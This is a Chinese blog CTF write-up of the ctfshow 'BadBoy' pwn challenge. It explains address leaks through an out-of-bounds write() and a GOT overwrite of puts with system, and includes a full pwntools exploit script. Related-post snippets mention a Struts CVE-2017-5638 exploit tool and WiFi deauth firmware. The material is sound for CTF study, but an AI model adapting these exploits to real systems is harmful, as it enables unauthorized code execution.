【pwn】ctfshow元旦水友赛--BadBoy

最新推荐文章于 2024-02-25 20:06:34 发布
最新推荐文章于 2024-02-25 20:06:34 发布
阅读量1.5k 收藏 30
点赞数 33
文章标签: python 网络安全 安全 系统安全 安全架构 ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/136059276
版权

首先先来看一下程序的保护情况

这里got表可改,没有开地址随机

接着看一下ida逻辑

很直接,只有一个main函数,一点点分析这段代码

buf[1] = __readfsqword(0x28u);
  init_func(argc, argv, envp);
  buf[0] = 'gfedcba';
  v5 = 0LL;
  while ( (_DWORD)kl )
  {
    puts("i am bad boy ");
    __isoc99_scanf("%ld", &v4);
    write(1, (char *)buf + v4, (unsigned int)kl);
    LODWORD(kl) = kl - 3;
  }

首先这一段设计的非常巧妙,kl的值是6,说明while循环可以执行两次,第一次只能泄露出6字节的值,第二次可以泄露3字节,然后buf地址的偏移是0x10,我们可以gdb看一下

可以发现第一个绿线是buf地址,第二个绿线可以泄露libc地址,第三个绿线可以泄露出栈地址

以下是泄露的exp:

io.sendlineafter("i am bad boy \n",str(40))

stack_addr=u64(io.recv(6).ljust(8,b'\x00'))

print(hex(stack_addr))

io.sendlineafter("i am bad boy \n",str(24))

libc_start_call_main = u64(io.recv(3).ljust(8,b'\x00'))

print("libc_start_call_main"+hex(libc_start_call_main))

libc地址其实3个字节就够用了

然后又可以往buf地址写个3个字节的值,这里我们只能写出'sh/x00'

接着修改puts_got的内容,修改成system函数,最后再调用puts(buf)的时候就可以达到getshell的目的

 __isoc99_scanf("%lld", &v5);
  if ( v5 > 8 )
    exit(0);
  printf("HaHaHa ");
  read(0, (char *)buf + v5, 3uLL);
  puts((const char *)buf);
  return 0;

ida代码中这个v5的值是可以输入负数,于是我们可以输入负数来实现got表的数据写入,我们只需要知道buf地址,以及puts_got的地址,buf地址可以通过泄露的栈地址减去0xf8来确定

puts_got的地址如下:

然后我们就要来解决system函数的问题,我们现在是可以往puts_got的地址处写入3字节的值,其实已经完全足够,因为其它5个字节都是随机生成的基址

首先我们先libc_start_main-231确定到libc_start_main函数的地址,然后减去libc_start_main函数偏移得到后3字节的基地址,再加上system的偏移就是system函数后3字节的真实地址

完整exp如下:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

#io=remote("pwn.challenge.ctf.show",28202)

io=process("./pwn")

elf=ELF("./pwn")

libc=elf.libc

io.sendlineafter("i am bad boy \n",str(40))

stack_addr=u64(io.recv(6).ljust(8,b'\x00'))

print(hex(stack_addr))

io.sendlineafter("i am bad boy \n",str(24))

libc_start_call_main = u64(io.recv(3).ljust(8,b'\x00'))

print("libc_start_call_main"+hex(libc_start_call_main))

io.sendlineafter(b"because i'm not girl ",b'sh\x00')

puts_got_addr=-(stack_addr-0xf8-0x601018)

print("puts_got_addr"+hex(puts_got_addr))

io.sendlineafter(b"so can you fell me? ",str(puts_got_addr))

system_addr=libc_start_call_main-231-libc.sym['__libc_start_main']+libc.sym["system"]

io.sendlineafter(b"HaHaHa ",p64(system_addr))

io.interactive()

GGb0mb
关注
  • 33
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF-Game-Challenges:精选各种CTF的游戏挑战清单
05-09
CTF游戏挑战 我最近一直在学习有关游戏黑客的知识,而我可以合法找到的最好的练习方法是玩 。 但是困难的部分是从以前的CTF中找出游戏中的挑战。 此列表包括我在玩ctfs和阅读文章时遇到的游戏挑战。 由于一些游戏服务器都处于离线状态,因此仅供参考,也没有明确的方法来设置它,或者开发人员没有开源它,因此我们现在不能玩它。 内容 电脑游戏 DragonSector CTF 2018 解决方案视频 Nullcon HackIM 2020年 Pwn冒险系列by Vector35 PwnAdventure资料库(在浏览器中) PwnAdventure 2 PwnAdventure 3 写作https://thekidofarcrania.gitlab.io/2018/11/18/csaw-finals-18/ https://www.digitaloperatives.com/201
[ctfshow 2023元旦水友]web题解
rev1ve的博客
01-05 2549
按照waf_in_waf_php对name的值进行waf以及waf_in_waf_php中的hint是base64,并且结合。简单点讲,就是我们先对我们的chu0的值进行加密也就是标记,然后拼接在一起后进行过滤器解析,利用最后的base64-decode无法解析前面ctfshowshowshowwww的垃圾字符被去除掉,而我们的chu0的值则会被正确解析并保留。有一个特性,当GET和POST有相同的变量时,匹配POST的变量,那么就可以同时传参GET和POST即可绕过,也就是POST传参数字。
ctfshow元旦水友-badboy
最新发布
fuiifiuiii的博客
02-25 380
6个字节足够泄露一个完整的地址,而三个字节不可以,由于需要将buf地址改为put_got的地址,所以一定要知道栈的地址,而3个字节已经足够libc的偏移地址。另:如果用远程打可以试着泄露下面的__libc_start_main,本地打通了,懒得再去打远程了。(至于为什么又加了一个,因为手动vmmap看libc载入地址的时候看错地方了,第一个才是载入地址,这里看成了第二个,所以多减了一次。地址分别相差0x18(24)和0x38(56),fd8-eb0=0x128(296)好久没打了,有人提到了,就看一看。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
[ctf.show 元旦水友杯 2024] pwn复现
weixin_52640415的博客
01-16 1134
rtld_global link_map setcontext+3d orw
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 953
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow--pwn入门--栈溢出
pandasaymmm的博客
06-21 249
这题像极了pwn23 代码就是判断我们输入的参数是否大于1,如果大于1进入ctfshow()函数并且将我们输入的第一个参数作为ctfshow函数的参数。ctfshow函数用到了strcpy()函数,而这个函数是可以发生溢出的。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
ciscn-2019-pwn
11-29
1. baby_pwn 2. bms 3. daily 4. Double 5 your_pwn
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN-PRACTICE-CTFSHOW-4
P1umH0的博客
01-16 665
PWN-PRACTICE-CTFSHOW-4BJDCTF2020-babyrouterBJDCTF2020-babystackBJDCTF2020-dizzyBJDCTF2020-encryptde stack BJDCTF2020-babyrouter 栈溢出,ret2libc # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.c
CTFshow pwn03(ret2libc-32bit
Mintind的博客
11-30 695
CTFshow-pwn03 writeup
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 2970
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow PWN
08-23
根据引用和引用中的内容,ctfshow函数是一个简单的栈溢出漏洞的示例程序。在32位程序中,返回地址一般是ebp + 4。而在64位程序中,返回地址一般是rbp + 8。通过利用栈溢出漏洞,我们可以修改返回地址,从而控制程序的执行流程。在ctfshow函数中,我们可以使用payload来覆盖返回地址,以实现获取shell的目的。具体的exploit代码如下: ``` from pwn import * #p = process("./pwn10") p = remote("111.231.70.44",28010) p.recv() payload = b"A"*(0x94) + p32(0x0804850F) p.send(payload) p.interactive() ``` 这段代码会将payload发送给目标程序,其中0x94是用来填充溢出的字节数,再加上要跳转到的地址0x0804850F。通过这个exploit,我们可以成功获取shell。 希望这个回答能够解决你的问题。如果你还有其他问题,请随时提问。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow-pwn新手系列](https://blog.csdn.net/gd_9988/article/details/106744216)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值